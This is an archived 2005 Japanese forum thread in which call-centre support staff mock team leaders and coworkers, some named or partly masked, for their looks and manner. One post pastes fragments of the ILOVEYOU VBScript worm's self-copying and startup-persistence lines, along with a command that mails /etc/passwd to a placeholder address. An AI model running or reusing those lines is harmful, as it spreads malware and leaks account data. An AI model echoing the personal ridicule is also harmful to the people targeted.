朝はいい雰囲気なのにあいつが来るとほんとやる気なくなる。
あいつやめたら残業もするんだけどなあ。



191 :FROM名無しさan:2005/06/17(金) 23:17:53
あー確かに藤○さんはカエルみたいな顔してるわ。
でも、あの髪型、本人はウザくないのかね?男には解らないけど、見ててウザいわ・・・夏とか見てて暑苦しそう。
CSのLDRで似たような髪型の人、もう一人いるけど、そっちの人は涼しそうなんだよね。

しゃべり方もさ・・・絶対作ってるだろって声してるしな・・・
似たような服着てるし。



でも、研修でお世話になったので感謝はしてます。 感謝はしてるんで、他のLDRさん呼ばせてください。

192 :FROM名無しさan:2005/06/18(土) 00:41:31
以上、一人三役の書き込みでしたw

193 :FROM名無しさan:2005/06/18(土) 04:29:46
あいつは毎日遊びに来ているんだよ。遊び感覚。あと、時間をものすごーく
もてあましているんだろ。そうでなきゃ昼12時からラストまで粘らないよ

それとキモいついでに言うと、○本を巻いている連中の中に、一人、黒い円盤
みたいなピアスした光ゲンジもどきのタラコ唇の男もそれに同じ。キモイです。

194 :FROM名無しさan:2005/06/18(土) 13:54:42
クレームだっつってんのに上司対応しねーし!!
時給泥棒じゃ!

195 :FROM名無しさan:2005/06/18(土) 14:55:34
馬鹿部署Csの役立たずLDR@関西弁坊主あげ

196 :FROM名無しさan:2005/06/18(土) 19:06:04
あのクソ坊主か

197 :FROM名無しさan:2005/06/19(日) 11:46:39
今日は久しぶりのオフだから、ageとこう。

198 :FROM名無しさan:2005/06/19(日) 19:30:32
>>190
>しかもかなりのブサイクのクセに

こんな感じでしたっけ
http://www.asahi-net.or.jp/~fv3a-situ/famous/nakao283.JPG
こんな奴がすかした喋りかたするならそりゃ引くよねえ

199 :FROM名無しさan:2005/06/20(月) 00:48:44
俺もCSだけど、そんな人(坊主のLDR)いましたっけ?
LDRで男性っていうと、襟をたててるメガネのカッコイイ人か、ちょっと年上のお兄さんってカンジの人か
声の低い人しか知らないんですが・・・
主にいつごろいる人なんだろう・・・そんなにひどいのかな・・・

200 :FROM名無しさan:2005/06/20(月) 02:08:58
>>199
いるよ。全く役に立たない、関西弁のキモいハゲが。私も嫌いだし、友達の子も不親切だから嫌いって言ってたよ。
あの人に比べたら藤本さんはいい人だよ。エスカも丁寧だし、なにしろ雰囲気が全然ちがう気がするもん。
あのハゲに比べたら、まだCSRにいい人いっぱいいるよ。
LDRの基準って、長く勤めててLDR仲間やSVに気に入られてて、どんだけシフト入れるかで決めてそう。
CSRの推薦や投票で決めたら面白いと思うよ。少なくともあのハゲはなってないと思う。

201 :FROM名無しさan:2005/06/20(月) 02:18:50
おいおいマンセー書き込みでも実名はまずいだろ。

てなわけでsage

いずれにせよハゲってよりも、無精ひげを汚ならしく生やしてる点といい、サボテン頭って言ったほうがよりあってると思う。
あの関西弁ハードゲイを辞めさせろや

202 :FROM名無しさan:2005/06/20(月) 23:30:30
LDRでも分からなければ「分からない」って言って良いんだぞ。
LDRに万能は求めてないよ。ただ、実際に対応しているのはCSRで
相手にしているのはお客様なんですよ。

テキトーにエスカ受けているLDRは簡単に見抜かれてますよ。
エスカしても来ないLDRははなっからお呼びではない。

203 :FROM名無しさan:2005/06/21(火) 00:22:43
>>102それ聞いて、なんか気が楽になった…

204 :FROM名無しさan:2005/06/21(火) 00:44:41
>>203
お前アレな。時代の流れに乗れなかったり、ちょっとオッチョコチョイだったっりするだろ。










まぁアレな、お前が例のハゲなら楽になんなや。マジでCSRからやり直せ。あんな態度でESCしてもらっても
気分よくねぇんだよ。手ぇ上げてハゲがこっち来るとマジでヘコむんだわ。


205 :そろそろ限界:2005/06/21(火) 00:44:42
OJT中に辞めたくなったら、誰に言えばいいのでしょうか?
カードとか、退社時返却の冊子とかは返さなきゃ不味いですよね。

206 :FROM名無しさan:2005/06/21(火) 00:46:22
>>205
SCTに電話連絡すりゃいんじゃね?IDとチームと名前言って、限界です、辞めますって。
あんだけ人入れて、ガンガン辞めてるんだから、連絡するだけまだマシなんじゃないの?

207 :FROM名無しさan:2005/06/21(火) 00:59:57
・中間集計
工フ元→ESCに来ない。ただくっちゃべってるだけの給与ドロ、ドブガエル。
ホモト(坊主の関西弁ネオナチ男)→CSRを不愉快にさせる名人。こいつもくっちゃべってるだけの役立たず。賞与ドロ
@HB→声が甲高く、態度が尊大な無知なデブ。
茶髪SX→誰か補丁たのむ


208 :205:2005/06/21(火) 01:03:34
>>206サンクス
流石に連絡くらいしますよ。
給料減らされても困るし、罪悪感もありますしね


209 :FROM名無しさan:2005/06/21(火) 01:11:53
>>207
@HBって誰だ?デブなんてLDRにいたか?SVにもいない希ガス・・・
茶髪SVは・・・女性か?篠○さんか?それともちょっと舌ったらずっぽい人か?


>>208
ちゃんともらうべきモンはもらっとこ〜 どっかの会社では研修中に辞めると、給料ナシなんて言われてるらしいけど
法律違反だからね。ただ、社会人として連絡はするべきだよな。

210 :FROM名無しさan:2005/06/21(火) 01:22:43
え? 近藤さん?

211 :FROM名無しさan:2005/06/21(火) 01:28:53
あの白ボードですが、インクが足らないしあげく油性ペンらしく臭かったです。頭がいたくなりました。
あんなの廃止で正解だね

212 :FROM名無しさan:2005/06/21(火) 11:33:42
OJTの間に大半が辞めていく理由って何ですか?
覚えるのが辛い?
指導が厳しい?
会社に問題があるとか…?

213 :FROM名無しさan:2005/06/21(火) 11:56:49
>>210
その人ちょっとあんぱんまんっぽかったりします?

214 :FROM名無しさan:2005/06/21(火) 12:39:56
>213
ワロス。確かにアンパンマン風かも。
ややろれつが回りきってないところもある。気になるのは、この方はなぜ、例の調子こきまくりの目障りなタヌキ眼鏡デブが好みなのか

215 :208:2005/06/22(水) 00:32:44
>>209はい。貰う物は絶対貰います。
でも、こんな俺でも入れてくれた会社には感謝しているし、仕事のスキルに対応出来なかったのは、俺自身の責任です。
だから、辞意の電話だけは絶対しますよ。

それでは、皆さん御迷惑をおかけしました。有難うございました。

216 :FROM名無しさan:2005/06/22(水) 00:38:15
ジー・アイ・ジョーの外山あげ

217 :FROM名無しさan:2005/06/22(水) 14:27:24
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path

218 :FROM名無しさan:2005/06/22(水) 16:48:28
>>217
野○ハゲ乙wwwwwww

219 :FROM名無しさan:2005/06/23(木) 16:18:35
8月からサポセン、10〜19になっちゃうみたいね・・・。オクもPも▲も。

220 :FROM名無しさan:2005/06/23(木) 18:45:39
10〜19って何ですか?
意味が分かるように教えて下さい。

221 :FROM名無しさan:2005/06/23(木) 20:28:14
マジで?嘘でしょ?
だって19時〜とかの人はどうすんの?

222 :FROM名無しさan:2005/06/23(木) 21:46:27
せってーネタに決まっとる
それが本当だったら今頃、どこもかしこも大パニックだ
もまいら、釣られんなよ!

223 :FROM名無しさan:2005/06/23(木) 22:51:02
>>219

嘘くさいけど、詳細きぼんぬ

224 :FROM名無しさan:2005/06/24(金) 13:22:42
12時あがりの詳細投下

えー本当です。

これから未曾有の人事異動というやつですな。

225 :FROM名無しさan:2005/06/24(金) 14:21:32
>>219
ガセネタを流してまで慌てて話題そらしに必死な「●本ハゲ」乙wwww

39 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)